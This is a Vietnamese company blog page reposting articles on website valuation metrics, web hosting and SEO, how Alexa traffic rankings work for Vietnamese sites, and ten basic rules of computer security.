Tuy nhiên với vùng Web thì phức tạp hơn. Để bắt đầu định giá vùng Bất động sản trên Web tôi áp dụng các chỉ số sau (Bài này áp dụng tại Việt Nam, nơi TMĐT chưa phát triển):
  • ROI bao gồm các chỉ số con (CPA (Cost per Acquisition), RPA (Revenue per Acquistion), ROI (Return of Investment))
  • Tỉ lệ chuyển đổi (Conversion) bao gồm các chỉ số sau: P/visit (Pageviews/number of visits), G/visit (Number of goal conversions/Number of visits), $/Visit (Revenue (từ e-commerce) hoặc Goal value/number of visits
  • VL/visit (Visitor Loyalty/ Visit), Length of visit, Depth of visit
  • Các chi phí tài sản.
(Theo WebmasterViet)

 
Up?

Hai điều quan trọng nhất quyết định tính sống còn của một trang web

By Công Ty Truyền Thông Số iGO

Có nhiều webmaster "cố tình" bỏ qua thực tế này và trong thực tế có rất nhiều bằng chứng cho thấy rằng nhiều web host không thể cung cấp những dịch vụ tin tưởng và đã làm cho một số website sống dở chết dở.

1. 1. Bạn cần một webhost thật tốt và hiệu quả

Cho dù bạn có quảng cáo tốt đến mức nào đi chăng nữa thì cũng chỉ phí công nếu họ không thể vào được trang web của bạn. Và điều đó xảy ra khá là thường xuyên nếu bạn không có một dịch vụ webhost đủ tốt. Có rất nhiều kinh nghiệm "đau thương" của các webmaster kể cho nhau về những dịch vụ hosting làm ăn kiểu chụp giựt. Một vài dịch vụ hosting của Việt Nam thì quảng cáo cho chán nào là hỗ trợ khách hàng 24/7/365, bandwidth nhiều không kể siết, space dùng bao nhiêu cũng được ... Nhưng trong thực tế họ lại host cho quá nhiều khách hàng thậm chí vượt qua mức giới hạn của server đó. Nói chung có 1001 cách mà các dịch vụ hosting của cả ta và tây đang làm cho các webmaster phải điên đầu. Và người phải chịu trận cho những việc này chính là các webmaster như tôi và bạn, việc website bị down vài giờ, hoặc too many connection hoặc server busy. Điều này là vô cùng đáng tiếc vì để một người chịu thăm site của mình đã khó, còn để người ta thất vọng bỏ đi rồi quay lại thì càng khó hơn.

2. Bạn nên biết về SEO (Search Engine Optimization) và Search Engine Submission.



Hai khái niệm này tạm dịch là Tối ưu hóa công cụ tìm kiếm hay được các webmaster gọi tắt là SEO và Thêm trang web vào dịch vụ tìm kiếm.

Một thực tế là có đến cả triệu website trên mạng cung cấp thông tin về mọi lĩnh vực và trong đó có khoảng phài ngàn trang cung cấp thông tin giống như trang của bạn. Cho nên ở một mớ bòng bong và hỗn loạn như ao hồ như thế này thì việc bị "chết ngộp" là hoàn toàn có thể xảy ra cho bất cứ ai.

Cho nên một trong những cách để giảm bớt nỗi kinh hoàng này là "ghi danh" trang của bạn vào công cụ tìm kiếm nào đó và chắc chắn rằng bạn phải SEO cho trang của bạn. Điều này sẽ giúp bạn khẳng định được vị trí trên mạng và tạo cơ hội cho người lướt web tìm thấy bạn trong muôn vàn những thứ khác.

Nếu vì một lý do nào đó bạn không có hai điều này, bất cứ điều gì bạn cố gắng cũng chỉ phí công vô ích. Do vậy hãy suy nghĩ thật chu đáo nhé!

Ý kiến của tôi: Tác giả của bài này nói không sai, tuy nhiên với điều kiện túi tiền của những người như tôi và bạn thì việc bỏ ra $50/ tháng cho một dịch vụ hosting là điều không tưởng. Cho nên .... chúng ta chỉ còn biết cầu trời cho ông thần hosting phù hộ độ trì cho con bớt khổ ... mỗi khi hạn hán!

(Theo www.vietphotoshop.com)

 
Up?

Ý nghĩa của Alexa với website tiếng Việt

By Công Ty Truyền Thông Số iGO

Làm thế nào để biết được trang web của mình đứng hàng thứ mấy trên Internet với hơn 8 tỉ website? Hãy vào trang www.alexa.com và nhập vào tên trang web bạn muốn biết. Và những chuyện liên quan đến vấn đề này...

Alexa.com ra đời từ năm 1996 và nay là Website hàng đầu chuyên về dịch vụ đo lường tần suất truy cập của mọi Website và xếp thứ hạng theo Top 500, Top 10.000 và Top 100.000. Danh sách các Top website này sẽ được bán cho những người có nhu cầu nghiên cứu đầu tư vì hầu hết các Website trong những Top này đều thuộc những tập đoàn công nghệ hay dịch vụ có tham gia thị trường chứng khoán quốc tế. Năm Website luôn dẫn đầu bảng xếp hạng của Alexa.com là Yahoo.com, MSN.com. Google.com, eBay.com và Microsoft.com. Những Website có tần suât truy cập thấp hơn 100.000 Website cao nhất sẽ không được liệt kê chi tiết tần suất truy cập.

Hàng ngày, Alexa.com "lùng sục" khắp cõi Internet, tính toán lượt người truy cập (gọi là "reach") và số trang được xem (gọi là"page view") của từng Website rồi xếp thứ hạng bằng cách tính bình quân tần suất trong vòng ba tháng vừa qua theo hồ sơ dữ liệu đã lưu trữ. Số lượt người truy cập được Alexa.com biểu thị theo tỷ lệ phần trăm của một triệu người dùng Internet ghé thăm site nào đó.

Một trang web được truy cập nhiều lần trong cùng một ngày bởi cùng một người chỉ được Alexa.com tính là một lần. Số lượng trang Web của một Website mà một người truy cập vào xem sẽ được tính bình quân

Alexa thống kê như thế nào?

Chỉ số Alexa Ranking xếp thứ hạng các website được truy cập thường xuyên, được thống kê dựa trên những người dùng cài đặt thanh công cụ Alexa Toolbar, một tiện ích giúp người dùng lướt web, nhất là người mới sử dụng, được dễ dàng và đa dạng hơn. Khi vào một website, thanh công cụ Alexa này sẽ hiển thị thứ hạng Ranking của website đó, đồng thời liệt kê các website có nội dung và mức độ phổ biến tương đồng. Giá trị thứ hạng của Alexa được biểu thị giống như xếp thứ học kỳ của học sinh phổ thông, tức là giá trị càng thấp thì mức độ phổ biến càng cao. Hiện tại, đã có hơn 10 triệu máy tính truy cập Internet ở mọi quốc gia trên thế giới cài đặt thanh công cụ Alexa Toolbar.

Chỉ số thứ hạng Alexa được kết hợp từ 2 yếu tố là số trang web người dùng xem (Page Views) và số người truy cập (Reach). Việc kết hợp này là một ý tưởng rất sáng tạo, vì nó loại bỏ được khả năng tạo ra các truy vấn ảo bằng các chương trình tự động. Các số liệu Page Views và Reach sẽ được thống kê theo ngày và tính giá trị trung bình trong thời gian 3 tháng gần nhất, từ đó tính ra chỉ số Alexa. Các chỉ số này được cập nhật tự động để phản ánh xu hướng thay đổi theo chu kỳ 3 ngày một lần.

Các phần mềm chống spyware có thể nhận diện Alexa Toolbar như một phần mềm gián điệp, vì nó sử dụng cookies để theo dõi toàn bộ các hoạt động truy cập website của người sử dụng. Tuy nhiên, có thể coi Alexa Toolbar là một spyware lành tính, vì nó coi người dùng như những thành viên không xác định danh tính tham gia vào việc xếp hạng các website.

Chỉ số Alexa thể hiện gì?

Theo cách thống kê trên, chỉ số Alexa của một website sẽ phản ánh số lượng người truy cập vào website đó, cũng như số lượng các trang trên website đó được những người dùng này truy cập vào.

Đây cũng là 2 yếu tố chính thể hiện mức độ phổ biến của một website, được nhiều người truy cập và có nhiều trang web được truy vấn. Đó chính là lý do các website "trưng" chỉ số Alexa Ranking lên mặt tiền trang chủ để chứng tỏ mức độ phổ biến của mình. Chỉ số Alexa cập nhật theo chu kỳ 3 ngày sẽ phản ánh sự thay đổi về thông lượng truy cập đột biến của website, còn chỉ số trung bình theo chu kỳ 3 tháng sẽ phản ánh mức độ truy cập ổn định trong cả một quý của website.

Ngoài ra, Alexa chỉ tính toán mức độ truy cập ở mức domain chính.

Trở thành thước đo chuẩn mực?

Với hơn 10 triệu máy tính cài đặt rải rác trên khắp mọi nơi trên thế giới, chỉ số Alexa trở thành một thước đo chuẩn mực trong việc đánh giá mức độ phổ biến của các website trên phạm vi toàn cầu. Tất nhiên, đây chỉ là một khái niệm mang tính tương đối, vì số người dùng Alexa Toolbar chỉ chiếm một phần rất nhỏ trong cộng đồng hiện có hơn 1 tỷ người dùng Internet toàn cầu, tương đương chỉ hơn... 1%.

Trở thành một chỉ số biểu thị giá trị, đồng nghĩa việc tăng chỉ số Alexa Ranking trở thành một mục tiêu phấn đấu, một "món hàng" có thể mua bán, trở thành một dịch vụ phổ biến. Chỉ cần truy cập vào Google.com và tìm kiếm với 3 từ khoá "Alexa + ranking + booster", một danh sách hàng ngàn phần mềm và dịch vụ kích chỉ số Alexa sẽ mời chào bạn sử dụng. Các dịch vụ tư vấn để nâng chỉ số Alexa và thứ hạng tìm kiếm trên Google cho website cũng nở rộ, vì càng phổ biến, doanh nghiệp của bạn sẽ càng tiếp cận được nhiều khách hàng tiềm năng hơn, thông qua một hệ thống liên kết vô song là Internet. Các từ khoá như Search Engine cùng Submission hay Marketing cũng dẫn tới hàng loạt dịch vụ đăng ký website vào cơ sở dữ liệu của các máy tìm kiếm phổ biến trên Internet.

Chỉ số Alexa cao và thứ hạng tìm kiếm cao trong kết quả Google cũng là 2 yếu tố tương hỗ nhau. Kết quả tìm kiếm cao trong Google sẽ làm tăng số người truy cập vào website của bạn, qua đó sẽ giúp tăng chỉ số Alexa. Chỉ số Alexa cao ngược lại cũng sẽ giúp website của bạn thường xuyên được Alexa Toolbar giới thiệu với người dùng hơn, được nhiều website đặt đường link tới hơn, và sẽ được các phần mềm tìm kiếm tự động của Google tìm thấy nhiều hơn, dẫn tới vị trí trong bảng kết quả tìm kiếm cao hơn.

Làm thế nào để tăng chỉ số Alexa?

Các dịch vụ kích và tăng chỉ số chủ yếu sẽ dựa vào việc tư vấn và thiết lập các thẻ META và từ khoá KEYWORDS trên website để thu hút các phần mềm tìm kiếm tự động (robot) ngó ngàng tới, lưu từ khoá vào cơ sở dữ liệu. Tuy nhiên, cuộc chạy đua thứ hạng và kết quả tìm kiếm không dừng lại ở đó. Có cung khắc có cầu. Các script (đoạn mã lập trình được nhúng trong nội dung html của các website và kích hoạt khi người dùng truy cập vào) chuyên về tạo các truy cập ảo bắt đầu xuất hiện. Các phần mềm chuyên dụng để kích Alexa ranking, với một danh sách hàng trăm địa chỉ IP sẵn có cũng ra đời. Chỉ cần nhập một địa chỉ Internet nào đó, hàng chục ngàn truy vấn sẽ được phần mềm gửi liên tục tới các địa chỉ IP, và không ít trong số này là các máy tính có cài đặt Alexa Toolbar. Các gói tin mà phần mềm gửi đi được thiết kế rất tinh vi, để khi tới địa chỉ IP đích, gói tin đó tiếp tục ra lệnh cho máy tính truy cập tới địa chỉ Internet của website cần kích chỉ số Alexa.

Do cách tính toán trung bình thông minh của Alexa, nên các phần mềm này thực tế không tỏ ra hiệu quả. Vài trăm địa chỉ IP không đủ để làm thay đổi thứ hạng Alexa ngay lập tức được. Nếu muốn có thay đổi đáng kể, số IP (sẽ được hiểu là người dùng web) cần huy động sẽ phải từ hàng chục tới hàng trăm ngàn, chưa kể phần mềm sẽ phải hoạt động liên tuc trong nhiều tháng trời, thậm chí là hàng năm, để cải thiện giá trị chỉ số trung bình. Tuy nhiên, hiện vẫn rất có nhiều dịch vụ trên Internet cam kết sẽ tăng chỉ số Alexa trong vòng 1-2 tháng, nếu không thành công thì... không lấy tiền.

Ý nghĩa của Alexa với website tiếng Việt?

Sau gần một tháng truy cập vào các diễn đàn của giới IT Việt Nam và nhờ "chỉ giáo", tác giả bài viết thực sự ngạc nhiên trước thái độ không mấy quan tâm của các thành viên trên diễn đàn. Có người trả lời: "Muốn tăng Alexa Ranking thi DOS (tấn công từ chối dịch vụ) nhẹ cho nó vài phát là tăng chỉ số ngay ấy mà". Tuy nhiên, theo nhận xét của một số chuyên gia có tìm hiểu về Alexa, phương thức này có vẻ không hiệu quả và đã được Alexa lường trước.

Đa phần các webmaster (người quản lý các website) cho rằng nếu để đánh giá các website tiếng Anh, thì Alexa có thể là một chỉ số phản ánh khá chính xác. Tuy nhiên, nếu như với các ngôn ngữ khác như tiếng Việt, thì Alexa chỉ là một giá trị tham số phản ánh một phần, chưa chính xác.

Hơn 10 triệu máy tính cài đặt Alexa Toolbar trên toàn cầu là nguồn cung cấp thông tin chính để đánh giá các website. Tuy nhiên, số lượng các máy tính cài đặt thanh công cụ này tại Việt Nam chưa đáng là bao, đơn giản vì Amazon.com chưa có kênh bán hàng trực tuyến tới Việt Nam. Hơn nữa, các máy tính từ quốc gia khác truy cập tới các website tiếng Việt cũng là thiểu số, vì chủ yếu là của những người Việt có khả năng đọc hiểu Việt ngữ.

Theo số liệu thống kê mới nhất của VNNIC, dân số Internet Việt Nam đã đạt mức 6,5 triệu người. Nếu so sánh đơn giản, thì số người dùng Internet truy cập các website tiếng Việt từ nước ngoài (có sử dụng Alexa Toolbar) chỉ chiếm một tỷ lệ rất nhỏ so với người dùng Internet Việt Nam. Phần lớn các máy tính kết nối Internet trong nước đều chưa cài Alexa Toolbar, nên chỉ số Alexa chưa thể phản ánh chính xác được hoạt động truy cập của các website tiếng Việt.

Các đại gia quảng cáo trực tuyến ở Việt Nam luôn dựa vào Alexa.com để thuyết phục khách hàng với kênh quảng cáo website công ty tôi có thư hạng từ 10 - 500. Đó cũng là tín hiệu khả quan của kênh truyền thông trực tuyến Việt Nam .

(Theo iGuru)


 
Up?

Mười quy tắc then chốt về an toàn và bảo mật

By Công Ty Truyền Thông Số iGO

1. Nếu một người nào đó có thể thuyết phục bạn chạy chương trình của anh ta trên máy tính của bạn, nó sẽ không còn là máy tính của bạn nữa

Nó chính là một trường hợp đáng tiếc của hệ thống máy tính: khi một chương trình máy tính chạy, nó sẽ thực hiện phần việc đã được lập trình, thậm chí nếu phần việc đã được lập trình gây nguy hiểm cho hệ thống máy tính. Đó chính là lí do tại sao thật là quan trọng khi chạy, thậm chí download một chương trình từ một tài nguyên không chứng thực. Nếu một người xa lạ đi tới bạn và đưa cho bạn một chiếc bánh sandwich, vậy liệu bạn có ăn nó không? Có lẽ là không. Nếu người bạn thân nhất của bạn đưa bạn chiếc bánh đó thì sao? có lẽ bạn sẽ ăn, có lẽ bạn sẽ không - điều này phụ thuộc vào liệu cô ấy làm nó hay tìm thấy nó trên phố. Việc lựa chọn sử dụng một chương trình cũng giống như bạn với chiếc bánh sandwich, điều này sẽ giúp bạn an toàn với hệ thống máy tính của bạn.

2. Nếu một người nào đó có thể sửa đổi hệ điều hành trên máy tính của bạn, nó sẽ không còn là máy tính của bạn nữa

Nhìn chung, hệ điều hành chỉ là một tập của các con số 1 và con số 0, khi được dịch bởi bộ vi xử lí. Việc thay đổi các con số 1 và số 0, nó sẽ làm cho một vài thứ khác đi. Nơi nào các con số 1 và số 0 này được lưu? Tại sao, trên hệ thống máy, thứ tự các con số luôn đi cùng với mọi thứ khác. Chúng chỉ là các file, và nếu một người nào khác có thể sử dụng hệ thống và được quyền thay đổi các file đó, điều này có nghĩa là hệ thống của bạn đã chết.

Anh ta có thể ăn cắp password, tạo cho anh ta có quyền quản trị hệ thống, hay thêm toàn bộ các chức năng mới tới hệ điều hành. Để ngăn cản kiểu tấn công này, phải đảm bảo chắc chắn rằng các file hệ thống được bảo vệ tốt nhất.

3. Nếu một người nào đó truy cập vật lí không hạn chế tới máy tính của bạn, nó sẽ không còn là máy tính của bạn nữa

Luôn luôn đảm bảo chắc chắn rằng một máy tính được bảo vệ về mặt vật chất, và nhớ rằng giá trị của hệ thống bao gồm không chỉ giá trị của bản thân phần cứng, mà còn giá trị của dữ liệu trên nó, và giá trị truy cập tới mạng của bạn mà người lạ đó có thể truy cập vào.

Mức tối thiểu, các hệ thống thương mại quan trọng như các điều khiển vùng (domain controller), các máy chủ cơ sở dữ liệu (database server) và các máy chủ dịch vụ in hay máy chủ chia se file nên được khoá mà chỉ cho phép người có quyền quản trị bảo trì và truy cập. Nhưng bạn có thể xem xét việc bảo vệ các hệ thống tốt hơn với các phương thức bảo vệ được thêm vào cho mỗi hệ thống.

4. Nếu bạn cho phép một người nào đó đẩy các chương trình tới website của bạn. Nó sẽ không còn là website của bạn

Điều này dựa trên luật 1, trong luật này người nào đó dùng thủ đoạn tiếp cận với nạn nhân trong khi download chương trình có hại trên hệ thống của anh ta và chạy nó. Còn trong trường hợp này, anh ta sẽ đẩy chương trình có hại tới hệ thống và chạy nó. Có rất nhiều người khi quản lý website quá ưu đãi với khách hàng của họ, và cho phép các vị khách có thể đẩy các chương trình tới site và chạy chúng. Điều này có thể dẫn tới hệ thống bị xâm phạm.

5. Các mật khẩu dễ nhận có thể làm hỏng hệ thống bảo mật mạnh

Mục đích của việc đăng nhập vào máy là để biết bạn là ai. Ban đầu, hệ điều hành biết bạn là ai, nó có thể cho phép ban truy cập tài nguyên hay từ chối. Nếu một người nào đó học được mật khẩu của bạ, anh ta có thể đăng nhập như bạn. Trong thực tế, nếu anh ta thành công, hệ thống máy sẽ coi anh ta là bạn. Bất kì bạn có thể thao tác gì với hệ thống, anh ta cũng có thể làm như vậy. Có lẽ bạn có các quyền trên mạng hơn anh ra và bạn có thể làm những thao tác mà anh ta bình thường anh ta không thể thực hiện. Hay có thể anh ta chỉ muốn làm một điều gì đó có ác ý hay đe doạ bạn. Trong bất kì trường hợp nào, tốt nhất nên bảo vệ mật khẩu của bạn.

6. Một hệ thống chỉ có độ an toàn như sự tin tưởng nhà quản trị

Mọi máy tính phải có một nhà quản trị: là một người nào đó có thể cài đặt chương trình phần mềm, cấu hình hệ điều hành, thêm và quản lí các account của user, thiết lập các chính sách về bảo mật, và điều khiển các thao tác quản lí được liên kết với việc giữ cho máy tính chạy tốt. Theo định nghĩa, các thao tác này đòi hỏi anh ta có toàn quyền với hệ thống. Điều này đặt nhà quản trị trong một vị trí rất quan trọng với hệ thống. Với một nhà quản trị không đáng tin cậy có thể loại bỏ hoàn toàn các quy chế về an toàn bảo mật mà bạn đã tạo ra. Anh ra có thể thay đổi quyền trên hệ thống, sửa các chính sách bảo mật của hệ thống, cài đặt các chương trình có hại vào trong hệ thống, thêm các user không có thật vào trong hệ thống hay làm bất kì điều gì với hệ thống. Anh ta có thể làm hỏng hệ thống ảo và bảo vệ của hệ điều hành, bởi vì anh ta điều khiển nó. Nếu bạn có một nhà quản trị không mấy tin tưởng, bạn có thể không có chế độ bảo mật.

7. Dữ liệu được mã hoá chỉ như chìa khoá giải mã

Giả như bạn vài đặt một hệ thống khoá lớn nhất, mạnh nhất, có độ bảo mật tốt nhất trên thế giới cho hệ thống của bạn, nhưng bạn phải đặt mã để mở được hệ thống đó. Nó sẽ thực sự là mạnh như thế nào, điều này còn phụ thuộc vào chìa khoá cho hệ thống khoá đó. Nếu chìa khoá quá giản đơn với hệ thống được bảo vệ, kẻ trộm có thể tìm ra nó. Vậy anh ta đã có mọi thứ để mở cánh cửa đó. Dữ liệu được mã hoá cũng chỉ an toàn như chìa khoá để giải mã nó.

8. Một hệ thống quét virus hết hạn thì cũng còn tốt hơn không có hệ thống diệt virus nào.

Các hệ thống quét virus làm việc được so sánh như hệ thống máy tính của bạn đối chọi với một loại virus được đăng kí. Mỗi một chữ kí là kí tự của một virus đặc biệt, và khi hệ thống quét tìm dữ liệu trong một file, email, hay bất kì đâu mà điền chữ kí. nó thông báo rằng đã tìm thấy virus. Tuy nhiên, một hệ thống quét virus có thể chỉ quét cho các virus mà nó đã biết. Điều này thật cần thiết cho hệ thống của bạn được cập nhật thường xuyên hệ thống diệt virus vào mọi ngày.

9. Tình trạng dấu tên hoàn toàn không thực tế

Toàn bộ loài người ảnh hưởng lẫn nhau bao hàm việc trao đổi dữ liệu về mọi mặt. Nếu một người nào đó đưa ra đủ dữ liệu, họ có thể mô tả được bạn. Hãy nghĩ về toàn bộ thông tin mà một người có thể thu được chỉ trong một cuộc hội thoại ngắn với bạn. Chỉ một cái liếc mắt, họ có thể phán đoán chiều cao, số cân, hay tuổi xấp xỉ mà bạn có. Giọng của bạn có thể nói cho họ biết rằng bạn từ đâu đến, và có thể thậm chí nói cho họ biết một vài điều về gia đình bạn, sở thích của bạn, nơi bạn sống, và bạn đang làm gì để kiếm sống. Điều đó không mất nhiều thời gian cho bất kì ai muốn thu lượm thông tin để mô tả bạn là ai. Nếu bạn ao ước được giấu mặt hoàn toàn, cách tốt nhất là sống trong hang động và tránh xa tiếp xúc với loài người.

10. Công nghệ không phải là tất cả

Công nghệ có thể làm một vài điều gây kinh ngạc cho mọi người. Những năm gần đây chúng ta đã được nhìn thấy sự phát triển tột bậc trong cả phần cứng cũng như phần mềm như: phần cứng rẻ đi và có nhiều tính năng mới, phần mềm cũng phát triển song song với phần cứng như tạo các tiêu chuẩn mới trong vấn đề an toàn và bảo mật v các ngành khoa học khác liên quan tới máy tính. Nó mở ra viễn cảnh mà công nghệ có thể tạo ra một thế giới mới với tính năng an toàn bảo mật tuyệt đối, nếu chúng ta làm việc chăm chỉ. Tuy nhiên, điều này là không thực tế.

Giải pháp là thừa nhận hai điểm mang tính bản chất. Điểm thứ nhất, an toàn bảo mật bao gồm cả công nghệ và chính sách, có nghĩa là, nó kết hợp công nghệ và hệ thống của bạn an toàn đến đâu với các vấn đề thuộc bản chất. Điểm thứ hai, an toàn bảo mật là một quá trình, không có kết thúc, nó không phải là một vấn đề mà có thể giải quyết một lần cho tất cả; nó là một tập các vấn đề luôn tồn tại và các biện pháp giữa người mang tính bảo vệ và người mang tính phá hoại.

Theo Media

 
Up?
Older Posts | Newer Posts

Công Ty Truyền Thông Số iGO

Loading...

Thiết Kế Website

Loading...

Quảng Bá Website

Loading...

Thương Mại Điện Tử

Loading...

Câu Chuyện Doanh Nhân

Loading...

Thị Trường Chứng Khoán

Loading...

Khách Thăm Trong Ngày